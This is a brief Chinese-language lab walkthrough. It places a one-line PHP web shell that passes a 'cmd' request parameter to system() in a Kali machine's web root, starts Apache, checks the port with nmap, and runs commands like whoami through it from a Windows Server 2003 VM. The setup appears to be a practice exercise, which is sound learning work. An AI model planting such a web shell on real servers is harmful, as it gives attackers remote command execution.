一、环境
kali和win2003server都处于NAT模式
二、操作过程
1、在kali的网站目录/var/www/html下新建一个PHP文件,命名为shell.php,写上php代码:<?php system($_REQUEST['cmd']);?>
2、用命令行创建文件的方法
3、查看kali的IP地址:192.168.252.131
4、开启kali的apache服务,并且用nmap查看开放的端口,发现80端口打开了
输入:service apache2 start
nmap 192.168.252.131
4、打开win2003server的浏览器,访问http://192.168.252.131/shell.php,并且加上一些命令
?cmd=ls,pwd,whoami